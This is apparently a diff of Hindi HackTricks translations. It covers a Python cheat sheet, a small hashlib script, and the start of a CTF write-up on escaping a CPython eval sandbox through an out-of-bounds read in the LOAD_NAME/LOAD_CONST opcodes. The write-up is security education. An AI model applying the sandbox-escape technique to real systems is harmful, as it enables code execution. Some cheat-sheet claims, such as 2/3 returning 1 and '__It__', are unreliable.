### मुख्य क्रियाएँ
|
||||
|
||||
एक संख्या को उठाने के लिए आप इस्तेमाल करते हैं: 3\*\*2 (नहीं 3^2)\
|
||||
यदि आप 2/3 करते हैं तो यह 1 लौटाता है क्योंकि आप दो ints (पूर्णांक) को विभाजित कर रहे हैं। यदि आप दशमलव चाहते हैं तो आपको floats से विभाजित करना चाहिए (2.0/3.0)।\
|
||||
यदि आप 2/3 करते हैं तो यह 1 लौटाता है क्योंकि आप दो ints (पूर्णांक) को विभाजित कर रहे हैं। यदि आप दशमलव चाहते हैं तो आपको floats (2.0/3.0) को विभाजित करना चाहिए।\
|
||||
i >= j\
|
||||
i <= j\
|
||||
i == j\
|
||||
|
@ -89,62 +90,62 @@ for i in range(0,100):
|
|||
for letter in "hola":
|
||||
#something with a letter in "hola"
|
||||
```
|
||||
### टपल्स
|
||||
### Tuples
|
||||
|
||||
t1 = (1,'2,'three')\
|
||||
t2 = (5,6)\
|
||||
t3 = t1 + t2 = (1, '2', 'three', 5, 6)\
|
||||
(4,) = Singelton\
|
||||
d = () empty tuple\
|
||||
d += (4,) --> एक टपल में जोड़ें\
|
||||
CANT! --> t1\[1] == 'New value'\
|
||||
list(t2) = \[5,6] --> टपल से सूची में
|
||||
t1 = (1, '2', 'तीन')\
|
||||
t2 = (5, 6)\
|
||||
t3 = t1 + t2 = (1, '2', 'तीन', 5, 6)\
|
||||
(4,) = सिंगलटन\
|
||||
d = () खाली टपल\
|
||||
d += (4,) --> टपल में जोड़ें\
|
||||
CANT! --> t1\[1] == 'नया मान'\
|
||||
list(t2) = \[5, 6] --> टपल से सूची में
|
||||
|
||||
### सूची (एरे)
|
||||
### List (array)
|
||||
|
||||
d = \[] empty\
|
||||
a = \[1,2,3]\
|
||||
b = \[4,5]\
|
||||
a + b = \[1,2,3,4,5]\
|
||||
b.append(6) = \[4,5,6]\
|
||||
tuple(a) = (1,2,3) --> सूची से टपल में
|
||||
d = \[] खाली\
|
||||
a = \[1, 2, 3]\
|
||||
b = \[4, 5]\
|
||||
a + b = \[1, 2, 3, 4, 5]\
|
||||
b.append(6) = \[4, 5, 6]\
|
||||
tuple(a) = (1, 2, 3) --> सूची से टपल में
|
||||
|
||||
### शब्दकोश
|
||||
### Dictionary
|
||||
|
||||
d = {} empty\
|
||||
monthNumbers={1:’Jan’, 2: ‘feb’,’feb’:2}—> monthNumbers ->{1:’Jan’, 2: ‘feb’,’feb’:2}\
|
||||
monthNumbers\[1] = ‘Jan’\
|
||||
monthNumbers\[‘feb’] = 2\
|
||||
list(monthNumbers) = \[1,2,’feb’]\
|
||||
monthNumbers.values() = \[‘Jan’,’feb’,2]\
|
||||
d = {} खाली\
|
||||
monthNumbers={1:'जनवरी', 2: 'फरवरी','फरवरी':2}—> monthNumbers ->{1:'जनवरी', 2: 'फरवरी','फरवरी':2}\
|
||||
monthNumbers\[1] = 'जनवरी'\
|
||||
monthNumbers\['फरवरी'] = 2\
|
||||
list(monthNumbers) = \[1, 2, 'फरवरी']\
|
||||
monthNumbers.values() = \['जनवरी', 'फरवरी', 2]\
|
||||
keys = \[k for k in monthNumbers]\
|
||||
a={'9':9}\
|
||||
monthNumbers.update(a) = {'9':9, 1:’Jan’, 2: ‘feb’,’feb’:2}\
|
||||
mN = monthNumbers.copy() #Independent copy\
|
||||
monthNumbers.get('key',0) #Check if key exists, Return value of monthNumbers\["key"] or 0 if it does not exists
|
||||
monthNumbers.update(a) = {'9':9, 1:'जनवरी', 2: 'फरवरी','फरवरी':2}\
|
||||
mN = monthNumbers.copy() #स्वतंत्र प्रतिलिपि\
|
||||
monthNumbers.get('कुंजी',0) #कुंजी मौजूद है या नहीं जांचें, monthNumbers\["कुंजी"] का मान लौटाएं या अगर यह मौजूद नहीं है तो 0
|
||||
|
||||
### सेट
|
||||
### Set
|
||||
|
||||
सेट में पुनरावृत्तियाँ नहीं होतीं हैं\
|
||||
myset = set(\['a', 'b']) = {'a', 'b'}\
|
||||
myset.add('c') = {'a', 'b', 'c'}\
|
||||
myset.add('a') = {'a', 'b', 'c'} #कोई पुनरावृत्ति नहीं\
|
||||
myset.update(\[1,2,3]) = set(\['a', 1, 2, 'b', 'c', 3])\
|
||||
myset.discard(10) #यदि मौजूद है, तो हटा दें, अगर नहीं, तो कुछ नहीं\
|
||||
myset.remove(10) #यदि मौजूद है, तो हटा दें, अगर नहीं, तो अपशिष्ट उठाएं\
|
||||
myset = set(\['ए', 'बी']) = {'ए', 'बी'}\
|
||||
myset.add('सी') = {'ए', 'बी', 'सी'}\
|
||||
myset.add('ए') = {'ए', 'बी', 'सी'} #कोई पुनरावृत्ति नहीं\
|
||||
myset.update(\[1, 2, 3]) = set(\['ए', 1, 2, 'बी', 'सी', 3])\
|
||||
myset.discard(10) #यदि मौजूद है, तो हटाएं, अगर नहीं, कुछ नहीं\
|
||||
myset.remove(10) #यदि मौजूद है, तो हटाएं, अगर नहीं, त्रुटि उठाएं\
|
||||
myset2 = set(\[1, 2, 3, 4])\
|
||||
myset.union(myset2) #मेरे सेट या myset2 में मान\
|
||||
myset.intersection(myset2) #मेरे सेट और myset2 में मान\
|
||||
myset.difference(myset2) #मेरे सेट में मान लेकिन myset2 में नहीं\
|
||||
myset.symmetric\_difference(myset2) #वह मान जो मेरे सेट और myset2 में नहीं हैं (दोनों में नहीं)\
|
||||
myset.pop() #सेट का पहला तत्व प्राप्त करें और हटा दें\
|
||||
myset.intersection\_update(myset2) #myset = मेरे सेट और myset2 में तत्व\
|
||||
myset.difference\_update(myset2) #myset = मेरे सेट में तत्व लेकिन myset2 में नहीं\
|
||||
myset.union(myset2) #मान myset या myset2 में\
|
||||
myset.intersection(myset2) #myset और myset2 में मान\
|
||||
myset.difference(myset2) #myset में मान लेकिन myset2 में नहीं\
|
||||
myset.symmetric\_difference(myset2) #वह मान जो myset और myset2 में नहीं हैं (दोनों में नहीं)\
|
||||
myset.pop() #सेट का पहला तत्व प्राप्त करें और हटाएं\
|
||||
myset.intersection\_update(myset2) #myset = myset और myset2 में तत्व\
|
||||
myset.difference\_update(myset2) #myset = myset में तत्व लेकिन myset2 में नहीं\
|
||||
myset.symmetric\_difference\_update(myset2) #myset = उन तत्वों को जो दोनों में नहीं हैं
|
||||
|
||||
### कक्षाएँ
|
||||
### Classes
|
||||
|
||||
\_\_It\_\_ में वाला विधि उसे तुलना करने के लिए उपयोग किया जाएगा यदि इस कक्षा के एक ऑब्जेक्ट दूसरे से बड़ा है
|
||||
\_\_It\_\_ में वाला विधि उसे तुलना करने के लिए उपयोग किया जाएगा कि क्या इस कक्षा का एक ऑब्जेक्ट दूसरे से बड़ा है
|
||||
```python
|
||||
class Person(name):
|
||||
def __init__(self,name):
|
||||
|
@ -172,19 +173,19 @@ MITPerson.nextIdNum += 1 #Attribute of the class +1
|
|||
def __it__(self, other):
|
||||
return self.idNum < other.idNum
|
||||
```
|
||||
### map, zip, filter, lambda, sorted और one-liners
|
||||
### मैप, ज़िप, फ़िल्टर, लैम्बडा, सॉर्टेड और वन-लाइनर्स
|
||||
|
||||
**Map** इसके जैसा है: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
|
||||
m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True]
|
||||
|
||||
**zip** उस समय रुकता है जब foo या bar में से छोटा हो जाता है:
|
||||
**Zip** उस समय रुकता है जब foo या bar में से छोटा हो जाता है:
|
||||
```
|
||||
for f, b in zip(foo, bar):
|
||||
print(f, b)
|
||||
```
|
||||
**लैम्बडा** का उपयोग एक फ़ंक्शन को परिभाषित करने के लिए किया जाता है\
|
||||
(lambda x,y: x+y)(5,3) = 8 --> लैम्बडा का उपयोग सरल **फ़ंक्शन** के रूप में करें\
|
||||
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> लैम्बडा का उपयोग सूची को क्रमबद्ध करने के लिए करें\
|
||||
(lambda x,y: x+y)(5,3) = 8 --> लैम्बडा का उपयोग एक सरल **फ़ंक्शन** के रूप में करें\
|
||||
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> लैम्बडा का उपयोग एक सूची को क्रमबद्ध करने के लिए करें\
|
||||
m = **filter**(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) = \[3, 6, 9] --> लैम्बडा का उपयोग फ़िल्टर करने के लिए करें\
|
||||
**reduce** (lambda x,y: x\*y, \[1,2,3,4]) = 24
|
||||
```
|
||||
|
@ -215,7 +216,7 @@ print “executing finally clause in any case”
|
|||
```
|
||||
### Assert()
|
||||
|
||||
यदि स्थिति गलत है तो स्क्रीन पर स्ट्रिंग प्रिंट होगी
|
||||
यदि स्थिति गलत है तो स्ट्रिंग स्क्रीन पर प्रिंट होगी
|
||||
```
|
||||
def avg(grades, weights):
|
||||
assert not len(grades) == 0, 'no grades data'
|
||||
|
@ -223,13 +224,12 @@ assert len(grades) == 'wrong number grades'
|
|||
```
|
||||
### जेनरेटर, yield
|
||||
|
||||
एक जेनरेटर, कुछ वापस नहीं देता, बल्कि यह कुछ "यील्ड" करता है। जब आप इसे एक्सेस करते हैं, तो यह पहले जेनरेट किया गया पहला मान "वापस" करेगा, फिर, आप इसे फिर से एक्सेस कर सकते हैं और यह अगला जेनरेट किया गया मान वापस करेगा। इसलिए, सभी मान एक साथ नहीं उत्पन्न होते हैं और इसका उपयोग करके सभी मानों वाली एक सूची की बजाय बहुत सारी मेमोरी बचाई जा सकती है।
|
||||
एक जेनरेटर, कुछ वापस नहीं करता, बल्कि वह कुछ "यील्ड" करता है। जब आप इसे एक्सेस करते हैं, तो यह पहले जेनरेट किए गए मान को "रिटर्न" करेगा, फिर, आप इसे फिर से एक्सेस कर सकते हैं और यह अगले जेनरेट किए गए मान को रिटर्न करेगा। इसलिए, सभी मान एक साथ नहीं जेनरेट होते हैं और इसका उपयोग करके एक सूची के बजाय बहुत सारी मेमोरी बचाई जा सकती है।
|
||||
```
|
||||
def myGen(n):
|
||||
yield n
|
||||
yield n + 1
|
||||
```
|
||||
```markdown
|
||||
g = myGen(6) --> 6\
|
||||
next(g) --> 7\
|
||||
next(g) --> त्रुटि
|
||||
|
@ -245,8 +245,8 @@ re.findall("\w+(la)","hola caracola") = \['la', 'la']
|
|||
. --> सब कुछ\
|
||||
\w --> \[a-zA-Z0-9\_]\
|
||||
\d --> संख्या\
|
||||
\s --> सफेद जगह वाला वर्ण\[ \n\r\t\f]\
|
||||
\S --> गैर-सफेद जगह वाला वर्ण\
|
||||
\s --> सफेद जगह वाले वर्ण\[ \n\r\t\f]\
|
||||
\S --> गैर-सफेद जगह वाले वर्ण\
|
||||
^ --> से शुरू होता है\
|
||||
$ --> से समाप्त होता है\
|
||||
\+ --> एक या अधिक\
|
||||
|
@ -264,27 +264,26 @@ re.findall("<.\*?>", "\<b>foo\</b>and\<i>so on\</i>") = \['\<b>', '\</b>', '\<i>
|
|||
|
||||
IterTools\
|
||||
**product**\
|
||||
from **itertools** import product --> 1 या अधिक सूचियों के बीच संयोजन उत्पन्न करता है, शायद मानों को दोहराता है, कार्तेसियन उत्पाद (वितरणीय गुणाकार)\
|
||||
from **itertools** import product --> 1 या अधिक सूचियों के बीच संयोजन उत्पन्न करता है, शायद मानों को दोहराता है, कार्टेशियन उत्पाद (वितरणीय गुणाकार)\
|
||||
print list(**product**(\[1,2,3],\[3,4])) = \[(1, 3), (1, 4), (2, 3), (2, 4), (3, 3), (3, 4)]\
|
||||
print list(**product**(\[1,2,3],repeat = 2)) = \[(1, 1), (1, 2), (1, 3), (2, 1), (2, 2), (2, 3), (3, 1), (3, 2), (3, 3)]
|
||||
|
||||
**permutations**\
|
||||
from **itertools** import **permutations** --> हर स्थान में सभी वर्णों के संयोजन उत्पन्न करता है\
|
||||
from **itertools** import **permutations** --> हर स्थान पर सभी वर्णों के संयोजन उत्पन्न करता है\
|
||||
print list(permutations(\['1','2','3'])) = \[('1', '2', '3'), ('1', '3', '2'), ('2', '1', '3'),... हर संभावित संयोजन\
|
||||
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] हर संभावित संयोजन जिनकी लंबाई 2 है
|
||||
print(list(permutations('123',2))) = \[('1', '2'), ('1', '3'), ('2', '1'), ('2', '3'), ('3', '1'), ('3', '2')] हर संभावित संयोजन लंबाई 2 का
|
||||
|
||||
**combinations**\
|
||||
from itertools import **combinations** --> विभिन्न वर्णों के बिना दोहराए गए सभी संभावित संयोजन उत्पन्न करता है ("ab" मौजूद है, "ba" उत्पन्न नहीं करता)\
|
||||
print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')]
|
||||
|
||||
**combinations\_with\_replacement**\
|
||||
from itertools import **combinations\_with\_replacement** --> वर्ण से आगे सभी संभावित संयोजन उत्पन्न करता है (उदाहरण के लिए, तीसरा तीसरे के बाद मिश्रित है लेकिन दूसरे या पहले के साथ नहीं)\
|
||||
print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')]
|
||||
from itertools import **combinations\_with\_replacement** --> वर्ण के बाद से सभी संभावित संयोजन उत्पन्न करता है (उदाहरण के लिए, 3 वाले से 3 वाले को मिश्रित करता है लेकिन 2 वाले या पहले वाले के साथ नहीं)\
|
||||
print(list(**combinations\_with\_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3)']
|
||||
|
||||
### डेकोरेटर्स
|
||||
|
||||
किसी फ़ंक्शन को निष्पादित करने के लिए जरूरी समय का आकार बढ़ाने वाला डेकोरेटर (यहाँ से): [यहाँ](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74):
|
||||
```
|
||||
कोड का समय जितना लगता है उसे निष्पादित करने के लिए डेकोरेटर (यहाँ से): [यहाँ](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74):
|
||||
```python
|
||||
from functools import wraps
|
||||
import time
|
||||
|
@ -302,22 +301,23 @@ return wrapper
|
|||
def decorated_func():
|
||||
print("Decorated func!")
|
||||
```
|
||||
यदि आप इसे चलाते हैं, तो आप कुछ इस प्रकार का कुछ देखेंगे:
|
||||
यदि आप इसे चलाते हैं, तो आप कुछ इस प्रकार का देखेंगे:
|
||||
```
|
||||
Let's call our decorated function
|
||||
Decorated func!
|
||||
Execution time: 4.792213439941406e-05 seconds
|
||||
```
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** को PRs जमा करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** PRs के जरिए [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```python
|
||||
import hashlib
|
||||
|
||||
|
@ -61,16 +62,17 @@ return 0
|
|||
|
||||
main()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) ज्वाइन करें या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,26 +1,27 @@
|
|||
# LOAD_NAME / LOAD_CONST ऑपकोड OOB पठन
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**यह जानकारी** [**इस लेख से ली गई थी**](https://blog.splitline.tw/hitcon-ctf-2022/)**।**
|
||||
|
||||
### TL;DR <a href="#tldr-2" id="tldr-2"></a>
|
||||
|
||||
हम LOAD_NAME / LOAD_CONST ऑपकोड में OOB पठन की सुविधा का उपयोग कर सकते हैं ताकि हम कुछ प्रतीक को मेमोरी में प्राप्त कर सकें। जिसका मतलब है ट्रिक का उपयोग करना `(a, b, c, ... सैकड़ों प्रतीक ..., __getattribute__) if [] else [].__getattribute__(...)` जैसे किसी प्रतीक (जैसे फ़ंक्शन का नाम) को प्राप्त करना।
|
||||
हम LOAD_NAME / LOAD_CONST ऑपकोड में OOB पठन की सुविधा का उपयोग कर सकते हैं ताकि हम कुछ प्रतीक मेमोरी में प्राप्त कर सकें। जिसका मतलब है आप चाहते हैं कि किसी प्रतीक (जैसे कि फ़ंक्शन का नाम) को प्राप्त करने के लिए `(a, b, c, ... सैकड़ों प्रतीक ..., __getattribute__) if [] else [].__getattribute__(...)` जैसे चालाकी का उपयोग करें।
|
||||
|
||||
फिर अपना उत्पादन तैयार करें।
|
||||
फिर अपना एक्सप्लॉइट तैयार करें।
|
||||
|
||||
### अवलोकन <a href="#overview-1" id="overview-1"></a>
|
||||
|
||||
|
@ -31,7 +32,15 @@ if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
|
|||
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
|
||||
print(eval(code, {'__builtins__': {}}))1234
|
||||
```
|
||||
आप विषयस्थ Python कोड दर्ज कर सकते हैं, और यह एक [Python कोड ऑब्जेक्ट](https://docs.python.org/3/c-api/code.html) में कंपाइल हो जाएगा। हालांकि, उस कोड ऑब्ज
|
||||
आप विषयस्थ Python कोड इनपुट कर सकते हैं, और यह [Python कोड ऑब्जेक्ट](https://docs.python.org/3/c-api/code.html) में कंपाइल हो जाएगा। हालांकि, उस कोड ऑब्जेक्ट के `co_consts` और `co_names` को eval करने से पहले खाली टपल के साथ बदल दिया जाएगा।
|
||||
|
||||
इस प्रकार, सभी अभिव्यक्ति जिसमें consts (जैसे संख्याएँ, स्ट्रिंग्स आदि) या नाम (जैसे वेरिएबल्स, फंक्शन्स) शामिल हो सकती हैं, उसका अंत में सेगमेंटेशन फॉल्ट हो सकता है।
|
||||
|
||||
### बाउंडरी के बाहर पठन <a href="#out-of-bound-read" id="out-of-bound-read"></a>
|
||||
|
||||
सेगफॉल्ट कैसे होता है?
|
||||
|
||||
एक सरल उदाहरण के साथ शुरू करें, `[a, b, c]` निम्नलिखित बाइटकोड में कंपाइल हो सकता है।
|
||||
```
|
||||
1 0 LOAD_NAME 0 (a)
|
||||
2 LOAD_NAME 1 (b)
|
||||
|
@ -39,11 +48,11 @@ print(eval(code, {'__builtins__': {}}))1234
|
|||
6 BUILD_LIST 3
|
||||
8 RETURN_VALUE12345
|
||||
```
|
||||
लेकिन अगर `co_names` खाली टपल में बदल जाएं? `LOAD_NAME 2` ओपकोड फिर भी क्रियान्वित होता है, और उस मेमोरी पते से मान पढ़ने की कोशिश करता है जिस पर यह मूल रूप से होना चाहिए था। हाँ, यह एक आउट-ऑफ-बाउंड पढ़ने "सुविधा" है।
|
||||
लेकिन अगर `co_names` खाली टपल बन जाए? `LOAD_NAME 2` ऑपकोड फिर भी क्रियान्वित होता है, और उस मेमोरी पते से मान को पढ़ने की कोशिश करता है जिस पर यह मूल रूप से होना चाहिए था। हाँ, यह एक आउट-ऑफ-बाउंड पठन "सुविधा" है।
|
||||
|
||||
समाधान के लिए मूल अवधारणा सरल है। CPython में कुछ ओपकोड जैसे `LOAD_NAME` और `LOAD_CONST` OOB पढ़ने के लिए भेद्य (?) हैं।
|
||||
समाधान के लिए मूल अवधारणा सरल है। CPython में कुछ ऑपकोड जैसे `LOAD_NAME` और `LOAD_CONST` खुलासे के लिए OOB पठन के लिए भेद्य (?) हैं।
|
||||
|
||||
